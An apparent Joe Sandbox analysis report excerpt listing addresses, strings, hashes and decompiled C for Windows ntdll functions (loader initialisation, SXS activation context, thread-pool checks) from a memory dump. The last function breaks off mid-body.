0x32904fa5
0x32904fca
0x32904fcf
0x32904fd0
0x32904fd9
0x32904fda
0x32904fdc
0x32904fe1
0x32904fe5
0x32904fe5
0x32904fa5
0x328c8400
0x328c8404
0x328c840d
0x00000000
0x00000000
0x00000000
0x328c840d

Strings

LdrpInitializeProcess, xrefs: 328C8342
@, xrefs: 328C84B1
\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers, xrefs: 328C847E
minkernel\ntdll\ldrinit.c, xrefs: 328C8341

Memory Dump Source

Source File: 00000003.00000002.1092236541.0000000032860000.00000040.00001000.00020000.00000000.sdmp, Offset: 32860000, based on PE: true

Associated: 00000003.00000002.1092236541.0000000032989000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.1092236541.000000003298D000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_32860000_wLlREXsA9M.jbxd

Similarity

API ID:
String ID: @$LdrpInitializeProcess$\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers$minkernel\ntdll\ldrinit.c
API String ID: 0-1918872054
Opcode ID: 5275ecad2717173da659a66cffa944c7fd1bde3cd7cb9b6288febb8a390c8608
Instruction ID: 0eeacb27dcc3b95679e12ecf51abda925c007159ebdf08dc63c057cdcd4da94a
Opcode Fuzzy Hash: 5275ecad2717173da659a66cffa944c7fd1bde3cd7cb9b6288febb8a390c8608
Instruction Fuzzy Hash: CC91AC79548354AFE722CA24D840FABB7ECEF84784F444D2EFA8892151E774D948CB62

Uniqueness

Uniqueness Score: -1.00%

Function 328C265C Relevance: 5.2, Strings: 4, Instructions: 249
COMMON

Download Yara Rule

C-Code - Quality: 84%

			E328C265C(signed char __ecx, signed int __edx, intOrPtr _a4, signed int* _a8, signed int* _a12, signed int* _a16) {
				signed int _v8;
				char _v532;
				signed int _v536;
				signed int _v540;
				signed int _v544;
				char* _v548;
				short _v550;
				short _v552;
				signed int* _v556;
				signed int* _v560;
				signed int* _v564;
				signed int _v568;
				void* __ebx;
				void* __edi;
				void* __esi;
				short _t95;
				intOrPtr _t96;
				void* _t104;
				signed int _t105;
				signed int* _t107;
				void* _t111;
				void* _t113;
				signed int _t119;
				intOrPtr _t120;
				void* _t121;
				char* _t128;
				signed int _t131;
				signed short _t139;
				signed int _t142;
				signed int _t147;
				signed int _t149;
				signed int _t154;

				_t141 = __edx;
				_v8 =  *0x3298b370 ^ _t154;
				_v556 = _a12;
				_t128 =  &_v532;
				_v560 = _a8;
				_t147 = 0;
				_v564 = _a16;
				_t142 = 0;
				_v540 = __ecx;
				_v532 = 0;
				_t131 = 0;
				_v552 = 0;
				_t95 = 2;
				_v550 = _t95;
				_t96 = _a4;
				_v536 = 0;
				_v544 = 0;
				_v548 = _t128;
				if(_t96 == 0x3286120c) {
					L3291EF10(0x33, 0, "SXS: %s() passed the empty activation context\n", "RtlpGetActivationContextDataStorageMapAndRosterHeader");
					_t148 = 0xc000000d;
					L39:
					return E328D4B50(_t148, _t128, _v8 ^ _t154, _t141, _t142, _t148);
				}
				if(_v560 != 0) {
					 *_v560 =  *_v560 & 0;
					_t147 = 0;
				}
				if(_v556 != _t131) {
					 *_v556 =  *_v556 & _t131;
					_t147 = _t131;
				}
				if(_v564 != _t131) {
					 *_v564 =  *_v564 & _t142;
					_t131 = _t142;
				}
				if((_v540 & 0xfffffffc) != 0 || _t141 == 0 || _v560 == _t142 || _v556 == _t142) {
					_push(_v556);
					_push(_v560);
					_push(_t141);
					_push(_v540);
					L3291EF10(0x33, 0, "SXS: %s() bad parameters:\nSXS:    Flags                : 0x%lx\nSXS:    Peb                  : %p\nSXS:    ActivationContextData: %p\nSXS:    AssemblyStorageMap   : %p\n", "RtlpGetActivationContextDataStorageMapAndRosterHeader");
					_t148 = 0xc000000d;
					goto L37;
				} else {
					if(_t96 != 0) {
						if(_t96 == 0xfffffffc) {
							L24:
							_t57 = _t141 + 0x200; // 0x230
							_t131 = _t57;
							_t104 =  *_t131;
							_t58 = _t141 + 0x204; // 0x234
							_t147 = _t58;
							_v536 = _t131;
							_v544 = _t147;
							if(_t104 == 0) {
								L33:
								_t105 =  *_t147;
								L34:
								_t141 = _v556;
								 *_v556 = _t105;
								 *_v560 =  *_t131;
								_t107 = _v564;
								if(_t107 != 0) {
									 *_t107 = _t142;
								}
								_t148 = 0;
								L37:
								if(_t128 != 0 && _t128 !=  &_v532) {
									E328A3B90( &_v552);
								}
								goto L39;
							}
							_t142 =  *((intOrPtr*)(_t104 + 0x18)) + _t104;
							L26:
							_t141 = 0;
							if( *_t131 != 0 &&  *_t147 == 0) {
								_t108 =  *(_t142 + 8);
								if( *(_t142 + 8) > 0x3ffffffc) {
									_t148 = 0xc0000095;
									goto L37;
								}
								_t111 = L328A5D90(_t131,  *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, 0xc + _t108 * 4);
								_t129 = _t111;
								if(_t111 == 0) {
									_t148 = 0xc0000017;
									L51:
									_t128 = _v548;
									goto L37;
								}
								_t141 =  *(_t142 + 8);
								_t113 = E328C33D0(_t129,  *(_t142 + 8), _t129 + 0xc);
								_t148 = _t113;
								if(_t113 < 0) {
									E328A3BC0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t129);
									goto L51;
								}
								_t147 = _v544;
								asm("lock cmpxchg [esi], ecx");
								if(0 != 0) {
									E32889303(_t129);
									E328A3BC0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t129);
								}
								_t131 = _v536;
								_t128 = _v548;
							}
							goto L33;
						}
						if((_v540 & 0x00000003) != 0) {
							goto L12;
						}
						_t131 = _t96 + 0x10;
						_t141 =  *_t131;
						if(_t141 == 0) {
							_t148 = 0xc00000e5;
							goto L39;
						}
						_t142 =  *((intOrPtr*)(_t141 + 0x18)) + _t141;
						_t105 = _t96 + 0x5c;
						goto L34;
					}
					L12:
					if(_t96 == 0xfffffffc || (_v540 & 0x00000002) != 0) {
						goto L24;
					} else {
						if(_t96 != 0) {
							if((_v540 & 0x00000001) == 0) {
								goto L26;
							}
						}
						_t31 = _t141 + 0x1f8; // 0x228
						_t131 = _t31;
						_t119 =  *_t131;
						_t32 = _t141 + 0x1fc; // 0x22c
						_t147 = _t32;
						_v536 = _t131;
						_v544 = _t147;
						if(_t119 == 0) {
							goto L33;
						}
						_t142 =  *((intOrPtr*)(_t119 + 0x18)) + _t119;
						_v568 = _t142;
						if( *_t147 != 0) {
							goto L26;
						}
						_t120 =  *((intOrPtr*)(_t141 + 0x10));
						_t141 = 0x208;
						_t139 =  *(_t120 + 0x38);
						_t142 =  *(_t120 + 0x3c);
						_t149 = _t139 & 0x0000ffff;
						_v540 = _t139;
						_t41 = _t149 + 0xe; // 0x23a
						_t121 = _t41;
						if(_t121 > 0x208) {
							if(_t121 <= 0xfffe) {
								_v550 = _t139 + 0xe;
								_t128 = L328A5D60(_t139 + 0x0000000e & 0x0000ffff);
								_v548 = _t128;
								if(_t128 != 0) {
									L19:
									E328D88C0(_t128, _t142, _t149);
									_t131 = _v536;
									_v552 = _v540 + 0xc;
									asm("movsd");
									asm("movsd");
									asm("movsd");
									asm("movsw");
									_t142 = _v568;
									_t147 = _v544;
									goto L26;
								}
								_t148 = 0xc0000017;
								goto L39;
							}
							_t148 = 0xc0000106;
							goto L39;
						}
						_t128 =  &_v532;
						_v550 = 0x208;
						_v548 = _t128;
						goto L19;
					}
				}
			}

0x328c265c
0x328c266e
0x328c2675
0x328c267b
0x328c2685
0x328c268b
0x328c2691
0x328c2697
0x328c269b
0x328c26a1
0x328c26a8
0x328c26aa
0x328c26b3
0x328c26b4
0x328c26bb
0x328c26be
0x328c26c4
0x328c26ca
0x328c26d5
0x32901ff1
0x32901ff9
0x328c2906
0x328c2916
0x328c2916
0x328c26e1
0x328c26e9
0x328c26eb
0x328c26eb
0x328c26f3
0x328c26fb
0x328c26fd
0x328c26fd
0x328c2705
0x328c270d
0x328c270f
0x328c270f
0x328c271b
0x329020a8
0x329020ae
0x329020b4
0x329020b5
0x329020c9
0x329020d1
0x00000000
0x328c2741
0x328c2743
0x328c2813
0x328c283c
0x328c283c
0x328c283c
0x328c2842
0x328c2844
0x328c2844
0x328c284a
0x328c2850
0x328c2858
0x328c28d2
0x328c28d2
0x328c28d4
0x328c28d4
0x328c28da
0x328c28e4
0x328c28e6
0x328c28ee
0x328c28f0
0x328c28f0
0x328c28f2
0x328c28f4
0x328c28f6
0x329020e2
0x329020e2
0x00000000
0x328c28f6
0x328c285d
0x328c285f
0x328c285f
0x328c2863
0x328c2869
0x328c2871
0x3290205d
0x00000000
0x3290205d
0x328c2889
0x328c288e
0x328c2892
0x32902067
0x32902080
0x32902080
0x00000000
0x32902080
0x328c2898
0x328c28a1
0x328c28a6
0x328c28aa
0x3290207b
0x00000000
0x3290207b
0x328c28b0
0x328c28ba
0x328c28c0
0x3290208d
0x3290209e
0x3290209e
0x328c28c6
0x328c28cc
0x328c28cc
0x00000000
0x328c2863
0x328c281c
0x00000000
0x00000000
0x328c2822
0x328c2825
0x328c2829
0x32902003
0x00000000
0x32902003
0x328c2832
0x328c2834
0x00000000
0x328c2834
0x328c2749
0x328c274c
0x00000000
0x328c275f
0x328c2761
0x32902014
0x00000000
0x00000000
0x3290201a
0x328c2767
0x328c2767
0x328c276d
0x328c276f
0x328c276f
0x328c2775
0x328c277b
0x328c2783
0x00000000
0x00000000
0x328c278c
0x328c2791
0x328c2797
0x00000000
0x00000000
0x328c279d
0x328c27a0
0x328c27a5
0x328c27a8
0x328c27ab
0x328c27ae
0x328c27b4
0x328c27b4
0x328c27b9
0x32902024
0x32902033
0x32902043
0x32902045
0x3290204d
0x328c27d2
0x328c27d5
0x328c27e8
0x328c27ee
0x328c27fd
0x328c27fe
0x328c27ff
0x328c2800
0x328c2802
0x328c2808
0x00000000
0x328c2808
0x32902053
0x00000000
0x32902053
0x32902026
0x00000000
0x32902026
0x328c27bf
0x328c27c5
0x328c27cc
0x00000000
0x328c27cc
0x328c274c

Strings

.Local, xrefs: 328C27F8
RtlpGetActivationContextDataStorageMapAndRosterHeader, xrefs: 32901FE3, 329020BB
SXS: %s() bad parameters:SXS: Flags : 0x%lxSXS: Peb : %pSXS: ActivationContextData: %pSXS: AssemblyStorageMap : %p, xrefs: 329020C0
SXS: %s() passed the empty activation context, xrefs: 32901FE8

Memory Dump Source

Source File: 00000003.00000002.1092236541.0000000032860000.00000040.00001000.00020000.00000000.sdmp, Offset: 32860000, based on PE: true

Associated: 00000003.00000002.1092236541.0000000032989000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.1092236541.000000003298D000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_32860000_wLlREXsA9M.jbxd

Similarity

API ID:
String ID: .Local$RtlpGetActivationContextDataStorageMapAndRosterHeader$SXS: %s() bad parameters:SXS: Flags : 0x%lxSXS: Peb : %pSXS: ActivationContextData: %pSXS: AssemblyStorageMap : %p$SXS: %s() passed the empty activation context
API String ID: 0-1239276146
Opcode ID: 326c6c56f8a4405d9d38272538d48974b80217c3396efaae31d50c97e108a83f
Instruction ID: 2e40a9cc580dec802f9e3b4a52ec8fa23c9a435e2f51d2a943d3bd1cea33b1e7
Opcode Fuzzy Hash: 326c6c56f8a4405d9d38272538d48974b80217c3396efaae31d50c97e108a83f
Instruction Fuzzy Hash: B9A18E7990132D9FDB24CF54D884B99B3B5BF58358F1041E9D808AB2A9DB70DE85CF90

Uniqueness

Uniqueness Score: -1.00%

Function 328963CB Relevance: 5.2, Strings: 4, Instructions: 211
COMMON

Download Yara Rule

C-Code - Quality: 56%

			E328963CB(signed int __ecx) {
				signed int _v8;
				intOrPtr _v68;
				intOrPtr _v72;
				char _v76;
				char _v92;
				char _v100;
				char _v104;
				void* __ebx;
				void* __edi;
				void* __esi;
				void* __ebp;
				void* _t88;
				intOrPtr _t100;
				signed int _t121;
				void* _t122;
				signed char _t126;
				void* _t128;
				void* _t131;
				void* _t133;
				signed int _t136;
				signed int _t138;

				_t123 = __ecx;
				_t138 = (_t136 & 0xfffffff8) - 0x64;
				_t83 =  *0x3298b370 ^ _t138;
				_v8 =  *0x3298b370 ^ _t138;
				_t121 = __ecx;
				if(__ecx == 0) {
					L15:
					_pop(_t128);
					_pop(_t133);
					_pop(_t122);
					return E328D4B50(_t83, _t122, _v8 ^ _t138, _t126, _t128, _t133);
				} else {
					asm("movsd");
					asm("movsd");
					asm("movsd");
					asm("movsd");
					_v104 = 0;
					_v100 = 0;
					_t88 = E328D8870( *[fs:0x18] + 0x19c,  &_v104, "true");
					_t138 = _t138 + 0xc;
					if(_t88 != 0) {
						_push("true");
						_push( &_v104);
						_push("true");
						_push(0xfffffffe);
						if(E328D2A60() >= 0) {
							_t123 =  *[fs:0x18];
							 *((intOrPtr*)(_t123 + 0x19c)) = _v104;
							 *((intOrPtr*)(_t123 + 0x1a0)) = _v100;
						}
					}
					if(( *(_t121 + 0x28) & 0x00000001) != 0) {
						if(( *(_t121 + 0x38) & 0x00000001) == 0) {
							_t123 = _t121;
							E328AC700(_t121);
							 *(_t121 + 0x28) =  *(_t121 + 0x28) & 0x000000fe;
						}
					}
					if( *((intOrPtr*)(_t121 + 0x2c)) != 0) {
						if(( *(_t121 + 0x38) & 0x00000002) == 0) {
							E328BF1F0(0);
							 *((intOrPtr*)(_t121 + 0x2c)) = 0;
						}
					}
					_t83 =  *(_t121 + 0x48);
					if(_t83 != 0 && ( *(_t83 + 0x10c) & 0x00000001) == 0) {
						_t83 =  *[fs:0x18];
						_push("true");
						_pop(_t131);
						if( *((intOrPtr*)( *[fs:0x18] + 0xf9c)) != 0) {
							if(( *(_t121 + 0x38) & 0x00000004) == 0) {
								L328D8F40( &_v92, 0, _t131);
								_t138 = _t138 + 0xc;
								_v72 =  *((intOrPtr*)(_t121 + 0x30));
								_v68 =  *((intOrPtr*)(_t121 + 0x34));
								_push( &_v92);
								_v92 = 0xc0000710;
								_v76 = 2;
								E328E8A60(_t123, _t126);
								_push("true");
								_v100 = 0;
								_push( &_v100);
								_push(5);
								_push(0xfffffffe);
								_t83 = E328D2A60();
							}
						}
						_t126 =  *(_t121 + 0x38);
						if((_t126 & 0x00000010) == 0 && E32896929() != 0) {
							_push( *((intOrPtr*)(_t121 + 0x34)));
							L3291EF10("true", 0, "ThreadPool: callback %p(%p) returned with a transaction uncleared\n",  *((intOrPtr*)(_t121 + 0x30)));
							L328D8F40( &_v92, 0, _t131);
							_t138 = _t138 + 0x20;
							_v92 = 0xc000071d;
							_v76 = 0;
							_push( &_v92);
							_t83 = E328E8A60(_t123, _t126);
							_t126 =  *(_t121 + 0x38);
						}
						if((_t126 & 0x00000020) == 0) {
							_t123 =  *[fs:0x18];
							_t100 =  *((intOrPtr*)( *[fs:0x30] + 0xa0));
							_t83 =  *(_t100 + 0xc);
							if( *(_t100 + 0xc) ==  *((intOrPtr*)( *[fs:0x18] + 0x24))) {
								_push( *((intOrPtr*)(_t121 + 0x34)));
								L3291EF10("true", 0, "ThreadPool: callback %p(%p) returned with the loader lock held\n",  *((intOrPtr*)(_t121 + 0x30)));
								L328D8F40( &_v92, 0, _t131);
								_t138 = _t138 + 0x20;
								_v92 = 0xc000071e;
								_v76 = 0;
								_push( &_v92);
								_t83 = E328E8A60(_t123, _t126);
								_t126 =  *(_t121 + 0x38);
							}
						}
						if((_t126 & 0x00000040) == 0) {
							_t83 =  *[fs:0x18];
							if( *((intOrPtr*)( *[fs:0x18] + 0xfb8)) != 0) {
								_push( *((intOrPtr*)(_t121 + 0x34)));
								L3291EF10("true", 0, "ThreadPool: callback %p(%p) returned with preferred languages set\n",  *((intOrPtr*)(_t121 + 0x30)));
								L328D8F40( &_v92, 0, _t131);
								_t138 = _t138 + 0x20;
								_v92 = 0xc000071f;
								_v76 = 0;
								_push( &_v92);
								_t83 = E328E8A60(_t123, _t126);
								_t126 =  *(_t121 + 0x38);
							}
						}
						if(_t126 >= 0) {
							_t83 =  *[fs:0x18];
							if( *((intOrPtr*)( *[fs:0x18] + 0xf88)) != 0) {
								_push( *((intOrPtr*)(_t121 + 0x34)));
								L3291EF10("true", 0, "ThreadPool: callback %p(%p) returned with background priorities set\n",  *((intOrPtr*)(_t121 + 0x30)));
								L328D8F40( &_v92, 0, _t131);
								_t138 = _t138 + 0x20;
								_v92 = 0xc0000720;
								_v76 = 0;
								_push( &_v92);
								_t83 = E328E8A60(_t123, _t126);
							}
						}
					}
					goto L15;
				}
			}

0x328963cb
0x328963d3
0x328963db
0x328963dd
0x328963e2
0x328963e8
0x328964d4
0x328964d8
0x328964d9
0x328964da
0x328964e5
0x328963ee
0x3289640e
0x32896415
0x32896416
0x32896417
0x3289641a
0x3289641e
0x32896422
0x32896427
0x3289642c
0x328f0d22
0x328f0d28
0x328f0d29
0x328f0d2b
0x328f0d34
0x328f0d3a
0x328f0d45
0x328f0d4f
0x328f0d4f
0x328f0d34
0x32896436
0x328f0d5e
0x328f0d64
0x328f0d66
0x328f0d6b
0x328f0d6b
0x328f0d5e
0x3289643f
0x328f0d78
0x328f0d7f
0x328f0d84
0x328f0d84
0x328f0d78
0x32896445
0x3289644a
0x32896459
0x3289645f
0x32896461
0x32896468
0x328f0d90
0x328f0d9d
0x328f0da5
0x328f0da8
0x328f0daf
0x328f0db7
0x328f0db8
0x328f0dc0
0x328f0dc8
0x328f0dcd
0x328f0dd3
0x328f0dd7
0x328f0dd8
0x328f0dda
0x328f0ddc
0x328f0ddc
0x328f0d90
0x3289646e
0x32896474
0x328f0de6
0x328f0df4
0x328f0e03
0x328f0e08
0x328f0e0b
0x328f0e17
0x328f0e1b
0x328f0e1c
0x328f0e21
0x328f0e21
0x32896486
0x3289648e
0x32896495
0x3289649b
0x328964a1
0x328f0e29
0x328f0e37
0x328f0e46
0x328f0e4b
0x328f0e4e
0x328f0e5a
0x328f0e5e
0x328f0e5f
0x328f0e64
0x328f0e64
0x328964a1
0x328964aa
0x328964ac
0x328964b8
0x328f0e6c
0x328f0e7a
0x328f0e89
0x328f0e8e
0x328f0e91
0x328f0e9d
0x328f0ea1
0x328f0ea2
0x328f0ea7
0x328f0ea7
0x328964b8
0x328964c0
0x328964c2
0x328964ce
0x328f0eaf
0x328f0ebd
0x328f0ecc
0x328f0ed1
0x328f0ed4
0x328f0ee0
0x328f0ee4
0x328f0ee5
0x328f0ee5
0x328964ce
0x328964c0
0x00000000
0x3289644a

Strings

ThreadPool: callback %p(%p) returned with background priorities set, xrefs: 328F0EB5
ThreadPool: callback %p(%p) returned with the loader lock held, xrefs: 328F0E2F
ThreadPool: callback %p(%p) returned with a transaction uncleared, xrefs: 328F0DEC
ThreadPool: callback %p(%p) returned with preferred languages set, xrefs: 328F0E72

Memory Dump Source

Source File: 00000003.00000002.1092236541.0000000032860000.00000040.00001000.00020000.00000000.sdmp, Offset: 32860000, based on PE: true

Associated: 00000003.00000002.1092236541.0000000032989000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.1092236541.000000003298D000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_32860000_wLlREXsA9M.jbxd

Similarity

API ID:
String ID: ThreadPool: callback %p(%p) returned with a transaction uncleared$ThreadPool: callback %p(%p) returned with background priorities set$ThreadPool: callback %p(%p) returned with preferred languages set$ThreadPool: callback %p(%p) returned with the loader lock held
API String ID: 0-1468400865
Opcode ID: 702c57d4e04ec16f8b10f6f4a62607c777a5e1d6a8b988ca51ca6444de4db3ed
Instruction ID: cc8982fee655757a74ee32032aceb9c654a7b8019c4fbd5d6d24dc433ce40ee7
Opcode Fuzzy Hash: 702c57d4e04ec16f8b10f6f4a62607c777a5e1d6a8b988ca51ca6444de4db3ed
Instruction Fuzzy Hash: CC7125B9904314AFD750DF58C880F8B7BA8EF85794F404868FC588B25AD775E188CBD2

Uniqueness

Uniqueness Score: -1.00%

Function 328890F8 Relevance: 5.1, Strings: 4, Instructions: 100COMMON

Download Yara Rule

Strings

HEAP[%wZ]: , xrefs: 328EB82F, 328EB86C
HEAP: , xrefs: 328EB83C, 328EB879
VirtualProtect Failed 0x%p %x, xrefs: 328EB849
VirtualQuery Failed 0x%p %x, xrefs: 328EB886

Memory Dump Source

Source File: 00000003.00000002.1092236541.0000000032860000.00000040.00001000.00020000.00000000.sdmp, Offset: 32860000, based on PE: true

Associated: 00000003.00000002.1092236541.0000000032989000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.1092236541.000000003298D000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_32860000_wLlREXsA9M.jbxd

Similarity

API ID: InitializeThunk
String ID: HEAP: $HEAP[%wZ]: $VirtualProtect Failed 0x%p %x$VirtualQuery Failed 0x%p %x
API String ID: 2994545307-1391187441
Opcode ID: edcaf23b9488276462d38c1a408f0236fe51eccd036876b833ce064ddbb731f6
Instruction ID: 84863a945bfb59574ea3e698070febd944c23d638c62e64fb795967f51cf9ec6
Opcode Fuzzy Hash: edcaf23b9488276462d38c1a408f0236fe51eccd036876b833ce064ddbb731f6
Instruction Fuzzy Hash: 1B31B43E901218EFD711CB58CC84FAAB7B8FF457A4F1040A1E925E7391DB74D941CA60

Uniqueness

Uniqueness Score: -1.00%

Function 32897072 Relevance: 4.7, APIs: 3, Instructions: 158
timeCOMMON

Download Yara Rule

C-Code - Quality: 55%

			E32897072(intOrPtr __ecx, void* __edx, intOrPtr _a4) {
				intOrPtr _v0;
				signed int _v8;
				signed int _v12;
				char _v16;
				signed int _v20;
				intOrPtr _v24;
				void* __ebx;
				void* __edi;
				void* __esi;
				void* __ebp;
				signed int _t51;
				signed int _t55;
				signed int* _t58;
				intOrPtr _t82;
				void* _t86;
				signed int _t87;
				signed int _t88;
				signed int _t92;
				signed int _t106;
				void* _t112;
				intOrPtr _t113;

				_t112 = __edx;
				_v24 = __ecx;
				_v20 = 0;
				_v16 = 0;
				_t113 =  *((intOrPtr*)(__edx + 0x58));
				if(_t113 != 0) {
					_push( &_v16);
					_push(0);
					_push(0);
					E328C85E0(_t86, __edx, __edx, _t113, __eflags);
				}
				_t87 = _t112 + 0x8c;
				_t92 =  *_t87;
				do {
					_t106 = _t92;
					_t51 = _t92 >> 1;
					if(_t51 == 0) {
						_v12 = _v12 & 0x00000000;
						_v8 = _v8 & 0x00000000;
					} else {
						_v12 = 1;
						_v8 = 1;
						if((_t92 & 0x00000001 | _t51 * 0x00000002 - 0x00000002) < 2) {
							_v8 = _v8 & 0x00000000;
						}
					}
					asm("lock cmpxchg [ebx], ecx");
					_t92 = _t106;
				} while (_t92 != _t106);
				_t88 = _t87 | 0xffffffff;
				if(_t113 != 0) {
					__eflags = _v12;
					if(__eflags != 0) {
						__eflags = E328B2120(_t88, _t92, 0, _t113);
						if(__eflags >= 0) {
							_t82 = _v24;
							_t33 = _t82 + 0x50;
							 *_t33 =  *(_t82 + 0x50) | 0x00000100;
							__eflags =  *_t33;
							 *((intOrPtr*)(_t82 + 0x64)) = _t113;
						} else {
							_v12 = _v12 & 0x00000000;
							_v8 = _v8 & 0x00000000;
							_v20 = 1;
						}
					}
					_push(_v16);
					_push(0);
					E328CA6D0(_t88, _t112, _t113, __eflags);
					__eflags = _v20;
					if(_v20 != 0) {
						E328BDB40(_t112 + 0x20, _t88, 0);
						E32964600(_t112);
					}
				}
				if(_v8 != 0) {
					_push(2);
					asm("lock xadd [edi], eax");
					_t55 = L328A3C40();
					__eflags = _t55;
					if(_t55 != 0) {
						_t58 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22c;
					} else {
						_t58 = 0x7ffe0386;
					}
					__eflags =  *_t58;
					if( *_t58 != 0) {
						E32964BE0( *((intOrPtr*)(_t112 + 0x5c)), _t112 + 0x78,  *((intOrPtr*)(_t112 + 0x30)),  *((intOrPtr*)(_t112 + 0x34)),  *((intOrPtr*)(_t112 + 0x3c)));
					}
					L328A1C8F(_t88, _t112 + 0x78,  *((intOrPtr*)(_t112 + 0x5c)), _t112,  *((intOrPtr*)(_t112 + 0x74)), 0);
					asm("lock xadd [edi], eax");
					if(__eflags == 0) {
						 *0x329891e0(_t112);
						 *((intOrPtr*)( *((intOrPtr*)( *((intOrPtr*)(_t112 + 4))))))();
					}
				}
				if(_a4 != 0) {
					__eflags = L32891F36(0);
					if(__eflags != 0) {
						 *((intOrPtr*)(_t112 + 0x70)) = _v0;
						asm("lock xadd [edi], eax");
						if(__eflags == 0) {
							 *0x329891e0(_t112);
							 *((intOrPtr*)( *((intOrPtr*)( *((intOrPtr*)(_t112 + 4))))))();
						}
					}
				}
				if(_v12 != 0) {
					E32897007(_v24, _t112);
					return 1;
				}
				asm("lock xadd [edi], ebx");
				__eflags = _t88 == 1;
				if(_t88 == 1) {
					 *0x329891e0(_t112);
					 *((intOrPtr*)( *((intOrPtr*)( *((intOrPtr*)(_t112 + 4))))))();
				}
				return 0;
			}

0x3289707d
0x3289707f
0x32897084
0x32897087
0x3289708a
0x3289708f
0x328f1534
0x328f1535
0x328f1536
0x328f1537
0x328f1537
0x32897095
0x3289709b
0x3289709d
0x3289709f
0x328970a1
0x328970a3
0x328f1541
0x328f1545
0x328970a9
0x328970b0
0x328970bf
0x328970c5
0x328970c7
0x328970cb
0x328970c5
0x328970cf
0x328970d3
0x328970d5
0x328970d9
0x328970de
0x328f1551
0x328f1555
0x328f155f
0x328f1561
0x328f1574
0x328f1577
0x328f1577
0x328f1577
0x328f157e
0x328f1563
0x328f1563
0x328f1567
0x328f156b
0x328f156b
0x328f1561
0x328f1581
0x328f1584
0x328f1586
0x328f158b
0x328f158f
0x328f159c
0x328f15a2
0x328f15a2
0x328f158f
0x328970e8
0x3289710e
0x32897111
0x32897115
0x3289711a
0x3289711c
0x328f15b5
0x32897122
0x32897122
0x32897122
0x32897129
0x3289712b
0x328f15ce
0x328f15ce
0x3289713c
0x32897143
0x32897147
0x328f15e0
0x328f15e6
0x328f15e6
0x32897147
0x328970ee
0x32897157
0x32897159
0x3289715e
0x32897163
0x32897167
0x328f15f5
0x328f15fb
0x328f15fb
0x32897167
0x32897159
0x328970f4
0x328970ff
0x00000000
0x32897106
0x328f1602
0x328f1606
0x328f1607
0x328f1611
0x328f1617
0x328f1617
0x00000000

APIs

RtlDebugPrintTimes.NTDLL ref: 328F15E0
RtlDebugPrintTimes.NTDLL ref: 328F15F5

Memory Dump Source

Source File: 00000003.00000002.1092236541.0000000032860000.00000040.00001000.00020000.00000000.sdmp, Offset: 32860000, based on PE: true

Associated: 00000003.00000002.1092236541.0000000032989000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.1092236541.000000003298D000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_32860000_wLlREXsA9M.jbxd

Similarity

API ID: DebugPrintTimes
String ID:
API String ID: 3446177414-0
Opcode ID: 363b31506d95dc8cbbfd88a31c7467fe243a7f0941474afdc1796d23ec95a08e
Instruction ID: 978c23ebceeafa1e9f03d0abcdce62ba8f592fd3a587a2275e1e71c85742039e
Opcode Fuzzy Hash: 363b31506d95dc8cbbfd88a31c7467fe243a7f0941474afdc1796d23ec95a08e
Instruction Fuzzy Hash: D551F0BCA04709EFEB09CF68C844BADB7B5BF48765F10416AE81697290DBB4D911CB80

Uniqueness

Uniqueness Score: -1.00%

Function 32923608 Relevance: 4.1, Strings: 3, Instructions: 398
COMMON

Download Yara Rule

C-Code - Quality: 96%

			E32923608(void* __ebx, intOrPtr __ecx, signed int __edx, void* __edi, void* __esi, void* __eflags) {
				short _t140;
				short _t141;
				signed char* _t146;
				char* _t147;
				signed char* _t149;
				intOrPtr _t150;
				signed short _t167;
				intOrPtr _t185;
				signed int _t193;
				intOrPtr _t201;
				void* _t204;
				void* _t205;
				signed char* _t206;
				signed char* _t213;
				intOrPtr _t216;
				signed int _t217;
				intOrPtr* _t218;
				signed int _t220;
				short _t223;
				signed short _t230;
				char* _t232;
				intOrPtr* _t235;
				void* _t239;
				void* _t258;
				intOrPtr _t266;
				intOrPtr _t267;
				intOrPtr _t269;
				char* _t271;
				char* _t274;
				signed int _t275;
				void* _t279;
				void* _t280;

				_push(0x45c);
				_push(0x3296cf20);
				L328E7C40(__ebx, __edi, __esi);
				 *(_t280 - 0x430) = __edx;
				_t266 = __ecx;
				 *((intOrPtr*)(_t280 - 0x428)) = __ecx;
				 *((intOrPtr*)(_t280 - 0x440)) =  *((intOrPtr*)(_t280 + 8));
				 *((intOrPtr*)(_t280 - 0x450)) =  *((intOrPtr*)(_t280 + 0x10));
				 *((intOrPtr*)(_t280 - 0x44c)) =  *((intOrPtr*)(_t280 + 0x14));
				 *((intOrPtr*)(_t280 - 0x444)) =  *((intOrPtr*)(_t280 + 0x18));
				 *((intOrPtr*)(_t280 - 0x434)) =  *((intOrPtr*)(_t280 + 0x1c));
				_t223 = 0x42;
				 *((short*)(_t280 - 0x43c)) = _t223;
				_push("true");
				_pop(_t140);
				 *((short*)(_t280 - 0x43a)) = _t140;
				 *(_t280 - 0x438) = L"LdrpResSearchResourceHandle Enter";
				_push("true");
				_pop(_t141);
				 *((short*)(_t280 - 0x464)) = _t141;
				 *((short*)(_t280 - 0x462)) = _t223;
				 *(_t280 - 0x460) = L"LdrpResSearchResourceHandle Exit";
				_t271 = 0;
				L328D8F40(_t280 - 0xc8, 0, _t141 + 0x6c);
				if(L328A3C40() == 0) {
					_t146 = 0x7ffe0385;
				} else {
					_t146 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22b;
				}
